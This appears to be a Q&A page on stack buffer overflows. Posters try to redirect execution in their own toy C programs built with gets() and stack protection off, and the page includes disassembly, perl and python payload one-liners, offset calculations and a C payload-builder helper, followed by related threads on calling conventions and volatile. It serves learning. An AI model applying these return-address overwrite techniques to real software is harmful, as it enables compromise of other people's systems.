Trouble replicating a stack buffer overflow exploit - c

I am having trouble replicating the stack buffer overflow example given by OWASP here.
Here is my attempt:
$ cat test.c
#include <stdio.h>
#include <string.h>
void doit(void)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
}
int main(void)
{
printf("So... The End...\n");
doit();
printf("or... maybe not?\n");
return 0;
}
$ gcc test.c -o test -fno-stack-protector -ggdb
$ objdump -d test # omitted irrelevant parts i think
000000000040054c <doit>:
40054c: 55 push %rbp
40054d: 48 89 e5 mov %rsp,%rbp
400550: 48 83 ec 10 sub $0x10,%rsp
400554: 48 8d 45 f0 lea -0x10(%rbp),%rax
400558: 48 89 c7 mov %rax,%rdi
40055b: e8 d0 fe ff ff callq 400430 <gets@plt>
400560: 48 8d 45 f0 lea -0x10(%rbp),%rax
400564: 48 89 c7 mov %rax,%rdi
400567: e8 a4 fe ff ff callq 400410 <puts@plt>
40056c: c9 leaveq
40056d: c3 retq
000000000040056e <main>:
40056e: 55 push %rbp
40056f: 48 89 e5 mov %rsp,%rbp
400572: bf 4c 06 40 00 mov $0x40064c,%edi
400577: e8 94 fe ff ff callq 400410 <puts@plt>
40057c: e8 cb ff ff ff callq 40054c <doit>
400581: bf 5d 06 40 00 mov $0x40065d,%edi
400586: e8 85 fe ff ff callq 400410 <puts@plt>
40058b: b8 00 00 00 00 mov $0x0,%eax
400590: 5d pop %rbp
400591: c3 retq # this is where i took my overflow value from
400592: 90 nop
400593: 90 nop
400594: 90 nop
400595: 90 nop
400596: 90 nop
400597: 90 nop
400598: 90 nop
400599: 90 nop
40059a: 90 nop
40059b: 90 nop
40059c: 90 nop
40059d: 90 nop
40059e: 90 nop
40059f: 90 nop
$ perl -e 'print "A"x12 ."\x91\x05\x40"' | ./test
So... The End...
AAAAAAAAAAAA▒#
or... maybe not? # this shouldn't be outputted
Why isn't this working? I'm assuming that the memory address that I am supposed to insert is the retq from <main>.
My goal is to figure out how to do a stack buffer overflow that calls a function elsewhere in the program. Any help is much appreciated. :)

I'm using Windows & MSVC but you should get the idea.
Consider the following code:
#include <stdio.h>
void someFunc()
{
puts("wow, we should never get here :|");
}
// MSVC inlines this otherwise
void __declspec(noinline) doit(void)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
}
int main(void)
{
printf("So... The End...\n");
doit();
printf("or... maybe not?\n");
return 0;
}
(Note: I had to compile it with /OPT:NOREF to force MSVC not to remove "unused" code and /GS- to turn off stack checks)
Now, let's open it in my favorite disassembler:
We'd like to exploit the gets vulnerability so the execution jumps to someFunc. We can see that its address is 001D1000, so if we can write enough bytes past the buffer to overwrite the return address, we'll be good. Let's take a look at the stack when gets is called:
As we can see, there are 8 bytes for our stack-allocated buffer (buf), 4 bytes of some stuff (actually the PUSHed EBP), and then the return address. Thus, we need to write 12 bytes of anything and then our 4-byte return address (001D1000, stored in little-endian byte order, i.e. 00 10 1D 00) to "hijack" the execution flow. Let's do just that: we'll prepare an input file with the bytes we need using a hex editor:
And indeed, when we run the program with that input, we get this:
After it prints that line, it will crash with an access violation, since there was some garbage on the stack. However, nothing stops you from carefully analyzing the code and crafting the input bytes so that the program appears to function normally (for example, we could overwrite the next bytes with the address of ExitProcess, so that someFunc would return there).
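For the x86-64 gcc build in the question, the same counting can be read off the objdump listing: buf sits at -0x10(%rbp), so there are 16 bytes up to the saved %rbp and another 8 for the saved %rbp itself, which gives 24 filler bytes before the return address rather than 12. The 12 "A"s plus 3 address bytes, plus the terminating NUL that gets appends, total exactly 16 bytes, so they never reach the return address, which would explain why the program ran normally. A minimal sketch of a payload builder follows; build_payload and its parameters are hypothetical names, and the offsets are assumptions taken from the listings above.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: fills `out` with filler bytes followed by the
 * little-endian target address. Returns the payload length, or 0 if
 * `out` is too small or `word` is larger than 8.
 *   buf_to_fp: distance from the buffer start to the saved frame pointer
 *   word:      pointer size in bytes (8 on x86-64, 4 on 32-bit x86)      */
size_t build_payload(unsigned char *out, size_t cap,
                     size_t buf_to_fp, size_t word, uint64_t target)
{
    size_t filler = buf_to_fp + word;   /* buffer + saved frame pointer */
    size_t total = filler + word;       /* plus the return address slot */

    if (word > sizeof target || total > cap)
        return 0;

    memset(out, 'A', filler);
    for (size_t i = 0; i < word; i++)   /* little-endian byte order */
        out[filler + i] = (unsigned char)(target >> (8 * i));
    return total;
}
```

With buf_to_fp = 0x10 and word = 8 this produces 24 filler bytes followed by the 8 address bytes; with buf_to_fp = 8 and word = 4 it produces the 12 + 4 layout described for the MSVC build. The bytes can be written out with fwrite and piped into the program. Two caveats: the payload must not contain 0x0a, because gets stops at a newline, and returning into a bare retq makes the CPU pop whatever follows the overwritten slot as the next return address, so a crash after the jump is still possible.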

Related

Segmentation fault inline jmp [duplicate]

I was playing with inline assembly, and I've noticed something strange. I've written a program which calls a wrapper function around jmp and runs in a loop:
#include <stdint.h>
void asm_jmp(void* address)
{
__asm__("jmp\t*%%rax"
:
:"a" (address)
:);
}
int main()
{
asm_jmp(&main + 4);
}
I opened it in gdb and noticed that it iterates hundreds and hundreds of times before segfaulting. Maybe I'm missing something, but I don't see what in this program could cause the segfault.
Initially I thought that calling asm_jmp in a loop exhausted the stack, since each call pushes a return address onto the stack but there is never a return to free that space. Is this the problem, or is it something else?
Here is the assembly obtained with objdump:
0000000000001119 <asm_jmp>:
1119: 55 push %rbp
111a: 48 89 e5 mov %rsp,%rbp
111d: 48 89 7d f8 mov %rdi,-0x8(%rbp)
1121: 48 8b 45 f8 mov -0x8(%rbp),%rax
1125: ff e0 jmp *%rax
1127: 90 nop
1128: 5d pop %rbp
1129: c3 ret
000000000000112a <main>:
112a: 55 push %rbp
112b: 48 89 e5 mov %rsp,%rbp
112e: 48 8d 05 0d 00 00 00 lea 0xd(%rip),%rax # 1142 <main+0x18>
1135: 48 89 c7 mov %rax,%rdi
1138: e8 dc ff ff ff call 1119 <asm_jmp>
113d: b8 00 00 00 00 mov $0x0,%eax
1142: 5d pop %rbp
1143: c3 ret
1144: 66 2e 0f 1f 84 00 00 cs nopw 0x0(%rax,%rax,1)
114b: 00 00 00
114e: 66 90 xchg %ax,%ax

C/C++ volatile variable accessed from another module

I know and understand the purpose of volatile variables and optimisation in general (well, I think I do!). This question relates specifically to what happens if a variable is accessed outside the module it is declared in.
In the following scenario, if funcThatWaits was called inside bar.c, it could be optimised and not fetch the value of sTheVar each loop iteration.
However, when GetTheVar is called externally could the same optimisation apply or does the function call ensure sTheVar will always be read each loop iteration?
I am not suggesting this is good code or practice, but an example for the sake of the question.
bar.h
int GetTheVar(void);
bar.c
static /*volatile*/ int sTheVar;
int GetTheVar(void)
{
return sTheVar;
}
static void someISROrFuncCalledFromAnotherThread(void)
{
sTheVar = 1;
}
foo.c
#include "bar.h"
void funcThatWaits(void)
{
while(GetTheVar() != 1) {}
}
when GetTheVar is called externally could the same optimisation apply or does the function call ensure sTheVar will always be read each loop iteration?
The same optimization may apply. For instance, if you are using LTO (Link-Time Optimization), then the compiler knows everything about GetTheVar and will likely decide funcThatWaits is an infinite loop (which, by the way, would be UB).
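A minimal sketch of the usual remedy, assuming the variable really is written from an ISR: restoring the volatile qualifier that the question comments out makes every call to GetTheVar perform a real load, whether or not the call ends up inlined. SetTheVar is a hypothetical stand-in for the ISR, and both files are shown as one unit for brevity. For a variable shared between threads, volatile alone is not a synchronization mechanism, so treat this as an illustration only.

```c
/* bar.c, with the qualifier restored */
static volatile int sTheVar;

int GetTheVar(void)
{
    return sTheVar;          /* volatile read: may not be cached or hoisted */
}

/* Hypothetical stand-in for the ISR in the question. */
void SetTheVar(int value)
{
    sTheVar = value;
}

/* foo.c */
void funcThatWaits(void)
{
    while (GetTheVar() != 1) {
        /* spin until the ISR stores 1 */
    }
}
```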
Function calls are not going to be optimized away since, for all the caller knows, the function being called could depend on some exogenous state.
I compiled the following three files using gcc:
foo.c
#include "bar.h"
void funcThatWaits(void) {
while ( getTheVar() != 1 );
}
bar.c
#include "foo.h"
static int theVar;
int getTheVar(void) {
return theVar;
}
void theFunc(void) {
funcThatWaits();
}
test.c
#include "bar.h"
int main() {
theFunc();
return 0;
}
Compiling those three into a.out and running objdump -d a.out, the following comes out:
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: e8 25 00 00 00 callq 628 <theFunc>
603: b8 00 00 00 00 mov $0x0,%eax
608: 5d pop %rbp
609: c3 retq
000000000000060a <funcThatWaits>:
60a: 55 push %rbp
60b: 48 89 e5 mov %rsp,%rbp
60e: 90 nop
60f: e8 08 00 00 00 callq 61c <getTheVar>
614: 83 f8 01 cmp $0x1,%eax
617: 75 f6 jne 60f <funcThatWaits+0x5>
619: 90 nop
61a: 5d pop %rbp
61b: c3 retq
000000000000061c <getTheVar>:
61c: 55 push %rbp
61d: 48 89 e5 mov %rsp,%rbp
620: 8b 05 ee 09 20 00 mov 0x2009ee(%rip),%eax # 201014 <theVar>
626: 5d pop %rbp
627: c3 retq
0000000000000628 <theFunc>:
628: 55 push %rbp
629: 48 89 e5 mov %rsp,%rbp
62c: e8 d9 ff ff ff callq 60a <funcThatWaits>
631: 90 nop
632: 5d pop %rbp
633: c3 retq
634: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
63b: 00 00 00
63e: 66 90 xchg %ax,%ax

exploiting Buffer Overflow using gets() in a simple C program

I am new to Buffer Overflow exploits and I started with a simple C program.
Code
#include <stdio.h>
#include <strings.h>
void execs(void){
printf("yay!!");
}
void return_input (void)
{
char array[30];
gets(array);
}
int main()
{
return_input();
return 0;
}
Compilation stage
I compiled the above program with cc by disabling stack protector as:
cc test.c -o test -fno-stack-protector
The dump of the elf file using objdump is as follows :
0804843b <execs>:
804843b: 55 push %ebp
804843c: 89 e5 mov %esp,%ebp
804843e: 83 ec 08 sub $0x8,%esp
8048441: 83 ec 0c sub $0xc,%esp
8048444: 68 10 85 04 08 push $0x8048510
8048449: e8 b2 fe ff ff call 8048300 <printf@plt>
804844e: 83 c4 10 add $0x10,%esp
8048451: 90 nop
8048452: c9 leave
8048453: c3 ret
08048454 <return_input>:
8048454: 55 push %ebp
8048455: 89 e5 mov %esp,%ebp
8048457: 83 ec 28 sub $0x28,%esp
804845a: 83 ec 0c sub $0xc,%esp
804845d: 8d 45 da lea -0x26(%ebp),%eax
8048460: 50 push %eax
8048461: e8 aa fe ff ff call 8048310 <gets@plt>
8048466: 83 c4 10 add $0x10,%esp
8048469: 90 nop
804846a: c9 leave
804846b: c3 ret
0804846c <main>:
804846c: 8d 4c 24 04 lea 0x4(%esp),%ecx
8048470: 83 e4 f0 and $0xfffffff0,%esp
8048473: ff 71 fc pushl -0x4(%ecx)
8048476: 55 push %ebp
8048477: 89 e5 mov %esp,%ebp
8048479: 51 push %ecx
804847a: 83 ec 04 sub $0x4,%esp
804847d: e8 d2 ff ff ff call 8048454 <return_input>
8048482: b8 00 00 00 00 mov $0x0,%eax
8048487: 83 c4 04 add $0x4,%esp
804848a: 59 pop %ecx
804848b: 5d pop %ebp
804848c: 8d 61 fc lea -0x4(%ecx),%esp
804848f: c3 ret
So, in order to exploit the buffer (array), we need to find the number of bytes allocated in the return_input stack frame, which, looking at the dump,
lea -0x26(%ebp),%eax
is 0x26 in hex, or 38 in decimal. So, giving input as:
38+4(random chars)+(return addr of execs)
would execute the execs function. I used the following:
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
But the output was an error:
Segmentation fault(core dumped)
When I opened the core dump in gdb, I found that the segmentation fault occurred while executing at the following address:
0xb76f2300
System information:
Ubuntu version : 16.10
Kernel version : 4.8.0-46-generic
Question?
What was I doing wrong in code?
I guess the reason is simple: you didn't halt/abort your program in the execs. That address 0xb76f2300 is on stack, so I suspect it is the return from the execs that fails when it tries to return to the value of the stored stack pointer.
That you don't see any message is because the stdout is line-buffered, and your message didn't have a new-line character, nor did you flush it explicitly; thus the yay!! will still be in the buffers.
Also, use a debugger.
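To make the message visible and avoid the crash on return, execs can end its output with a newline, flush it, and terminate instead of returning. A minimal sketch; say_yay is a hypothetical helper, introduced only so that the output step can be exercised on its own.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical helper: writes the message and flushes it immediately. */
int say_yay(FILE *out)
{
    if (fputs("yay!!\n", out) == EOF)
        return -1;
    return fflush(out);      /* 0 on success, EOF on failure */
}

void execs(void)
{
    say_yay(stdout);
    exit(0);                 /* never return through the overwritten frame */
}
```

Calling exit also flushes open stdio streams, so the explicit fflush is redundant here; it is kept to show what would be needed if execs ended some other way.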

Understanding how parameters are passed to functions in Assembly

I am reading this writeup on how to perform a ret2libc exploit. It states that the arguments passed to a function are stored at ebp+8.
Now, if I take a simple C program
#include <stdlib.h>
int main() {
system("/bin/sh");
}
And compile it:
gcc -m32 -o test_sh test_sh.c
and look at the disassembly of it with
objdump -d -M intel test_sh
0804840b <main>:
804840b: 8d 4c 24 04 lea ecx,[esp+0x4]
804840f: 83 e4 f0 and esp,0xfffffff0
8048412: ff 71 fc push DWORD PTR [ecx-0x4]
8048415: 55 push ebp
8048416: 89 e5 mov ebp,esp
8048418: 51 push ecx
8048419: 83 ec 04 sub esp,0x4
804841c: 83 ec 0c sub esp,0xc
804841f: 68 c4 84 04 08 push 0x80484c4
8048424: e8 b7 fe ff ff call 80482e0 <system@plt>
8048429: 83 c4 10 add esp,0x10
804842c: b8 00 00 00 00 mov eax,0x0
8048431: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
8048434: c9 leave
8048435: 8d 61 fc lea esp,[ecx-0x4]
8048438: c3 ret
8048439: 66 90 xchg ax,ax
804843b: 66 90 xchg ax,ax
804843d: 66 90 xchg ax,ax
804843f: 90 nop
The line
804841f: 68 c4 84 04 08 push 0x80484c4
pushes the address of the string "/bin/sh" onto the stack. Immediately afterwards the system@plt function is called. So how does one arrive at ebp+8 from the above output?
Help would be appreciated!
The arguments passed to a function are stored at ebp+8.
That's from the called function's point of view, not from the calling function's point of view. The calling function has its own arguments at ebp+8, and your main() does not use any of its arguments, hence, you don't see any use of ebp+8 in your main().
You can see ebp+8 being used as follows:
Try writing a second function, with arguments, and calling it from main(), instead of invoking system(). You still won't see any use of ebp+8 within main(), but you will see it being used in your second function.
Try declaring your main() to accept its char** argv argument, then try sending argv[0] to printf().
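A minimal sketch of the first suggestion; add_one is a hypothetical function. Built with gcc -m32 without optimization and disassembled with objdump as in the question, the body of add_one is where a load relative to ebp+8 would be expected to show up, assuming frame pointers are kept; the exact instructions depend on the compiler version and flags.

```c
/* Hypothetical callee. In a 32-bit cdecl frame, after the prologue
 * `push ebp; mov ebp, esp`:
 *   [ebp]     holds the caller's saved ebp
 *   [ebp + 4] holds the return address pushed by `call`
 *   [ebp + 8] holds the first argument, here x                     */
int add_one(int x)
{
    return x + 1;
}
```

Calling add_one(41) from main() in place of system("/bin/sh") is enough to try this: main() only pushes the argument, and the ebp+8 access appears on the callee's side.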
You don't, because EBP + 8 only becomes relevant inside the called function (reached through system@plt), after its prologue has created a new stack frame:
push ebp
mov ebp, esp
At this point the saved EBP is at EBP, the return address is at EBP + 4, and the memory location pointed to by EBP + 8 contains 0x80484C4.

Try to understand calling process in assembly code

I wrote a very simple program in C and try to understand the function calling process.
#include "stdio.h"
void Oh(unsigned x) {
printf("%u\n", x);
}
int main(int argc, char const *argv[])
{
Oh(0x67611c8c);
return 0;
}
And its assembly code seems to be
0000000100000f20 <_Oh>:
100000f20: 55 push %rbp
100000f21: 48 89 e5 mov %rsp,%rbp
100000f24: 48 83 ec 10 sub $0x10,%rsp
100000f28: 48 8d 05 6b 00 00 00 lea 0x6b(%rip),%rax # 100000f9a <_printf$stub+0x20>
100000f2f: 89 7d fc mov %edi,-0x4(%rbp)
100000f32: 8b 75 fc mov -0x4(%rbp),%esi
100000f35: 48 89 c7 mov %rax,%rdi
100000f38: b0 00 mov $0x0,%al
100000f3a: e8 3b 00 00 00 callq 100000f7a <_printf$stub>
100000f3f: 89 45 f8 mov %eax,-0x8(%rbp)
100000f42: 48 83 c4 10 add $0x10,%rsp
100000f46: 5d pop %rbp
100000f47: c3 retq
100000f48: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
100000f4f: 00
0000000100000f50 <_main>:
100000f50: 55 push %rbp
100000f51: 48 89 e5 mov %rsp,%rbp
100000f54: 48 83 ec 10 sub $0x10,%rsp
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
100000f72: 31 c0 xor %eax,%eax
100000f74: 48 83 c4 10 add $0x10,%rsp
100000f78: 5d pop %rbp
100000f79: c3 retq
Well, I don't quite understand the argument-passing process. Since there is only one parameter passed to the Oh function, I can understand this:
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
So what does the code below do? Why rbp? Isn't it abandoned in x86-64 assembly? If this is x86-style assembly, how can I generate x86-64-style assembly using clang? If it is x86, it doesn't matter; could anyone explain the code below line by line for me?
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
You might get cleaner code if you turned optimizations on, or you might not. But, here’s what that does.
The %rbp register is being used as a frame pointer, that is, a pointer to the original top of the stack. It’s saved on the stack, stored, and restored at the end. Far from being removed in x86_64, it was added there; the 32-bit equivalent was %ebp.
After this value is saved, the program allocates sixteen bytes off the stack by subtracting from the stack pointer.
There then is a very inefficient series of copies that sets the first argument of Oh() as the second argument of printf() and the constant address of the format string (relative to the instruction pointer) as the first argument of printf(). Remember that, in this calling convention, the first argument is passed in %rdi (or %edi for 32-bit operands) and the second in %rsi (or %esi). This could have been simplified to two instructions.
After calling printf(), the program (needlessly) saves the return value on the stack, restores the stack and frame pointers, and returns.
In main(), there’s similar code to set up the stack frame, then the program saves argc and argv (needlessly), then it moves around the constant argument to Oh into its first argument, by way of %eax. This could have been optimized into a single instruction. It then calls Oh(). On return, it sets its return value to 0, cleans up the stack, and returns.
The code you’re asking about does the following: stores the constant 32-bit value 0 on the stack, saves the 32-bit value argc on the stack, saves the 64-bit pointer argv on the stack (the first and second arguments to main()), and sets the first argument of the function it is about to call to %eax, which it had previously loaded with a constant. This is all unnecessary for this program, but would have been necessary had it needed to use argc and argv after the call, when those registers would have been clobbered. There’s no good reason it used two steps to load the constant instead of one.
As Jester mentions, you still have frame pointers on (to aid debugging), so stepping through main:
0000000100000f50 <_main>:
First we enter a new stack frame, we have to save the base pointer and move the stack to the new base. Also, in x86_64 the stack frame has to be aligned to a 16 byte boundary (hence moving the stack pointer by 0x10).
100000f50: push %rbp
100000f51: mov %rsp,%rbp
100000f54: sub $0x10,%rsp
As you mention, x86_64 passes parameters by register, so load the param in to the register:
100000f58: mov $0x67611c8c,%eax
??? Help needed
100000f5d: movl $0x0,-0x4(%rbp)
From here: "Registers RBP, RBX, and R12-R15 are callee-save registers", so if we want to save other registers then we have to do it ourselves ....
100000f64: mov %edi,-0x8(%rbp)
100000f67: mov %rsi,-0x10(%rbp)
Not really sure why we didn't just load this in %edi where it needs to be for the call to begin with, but we better move it there now.
100000f6b: mov %eax,%edi
Call the function:
100000f6d: callq 100000f20 <_Oh>
This is the return value (passed in %eax). xor is a smaller instruction than loading 0, so it is a common optimization:
100000f72: xor %eax,%eax
Clean up that stack frame we added earlier (not really sure why we saved those registers on it when we didn't use them)
100000f74: add $0x10,%rsp
100000f78: pop %rbp
100000f79: retq
